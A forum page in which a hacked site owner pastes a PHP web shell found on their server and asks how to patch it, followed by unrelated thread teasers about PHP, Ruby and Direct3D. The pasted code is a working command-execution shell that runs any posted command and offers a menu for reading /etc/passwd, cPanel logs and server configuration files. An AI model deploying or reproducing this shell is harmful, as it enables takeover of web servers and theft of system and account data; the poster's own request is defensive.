I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
passthru() help
Hi everyone,I'm new to the forum and to PHP. I have some pretty good experience writing shell scripts, but beyond that, I'm not much of a programmer. That being said, here's what I'm trying to do:I'm
Sequencing or queuing parallel process
Scenario is as followsThere is one parent process say P1 and 4 child processes say A B C DProcess A starts at 3:00 pm Process B starts at 3:15 pm Process C starts at 3:30 pm Process D starts at 3:45
check_changed_data - I can't get data from the called method event
I use check_changed_data to trigger my event method.
session checking in page load
hai all
help need on ob_start()
HiI am a newbie in php, I have a codeLine number On/Off | Expand/Contract <?phpob_start();for($i=1;$i<=10;$i++){ sleep(1); echo $i; ob_flush();}?> I am trying to
Unidentified index error in a simple form
I have been trying to make an HTML form that is handled by a PHP script. So far my attempts to get it to work have proven fruitless.I'm referencing the Visual Quickstart Guide for PHP to learn PHP,
Somebody hacked into my site and changed coding >>> URGENT HELP NEEDED <<<
I am not that much into programming , but somebody is hacking to my site and injecting some kind of iframes ... it happened to another site , but that wasn't that important for me, but now it has
ASP.NET 2.0 - Enter Key - Default Submit Button
Hi,One of the most annoying things in developing web pages is handling the "Enter key" for form submission. Enter key has been the favourite way users like to submit forms. Though we provide Buttons
Scene graph using Direct3D?
There are several C++ scene graph based packages available for OpenGl, like say OSG,http://www.openscenegraph.org/projects/osgBut do you by any chance know about such a package based on Direct3D?Thank
Not connecting to DB using ruby, error:env.c:257:in oci8lib.so: ORA-12154:
Hi All,I am trying to connect to the database server from the client server using ruby and facing the following issue-$ruby -r oci8 -e "OCI8.new('temp','temp','//host:1521/sid').exec('select count(1)
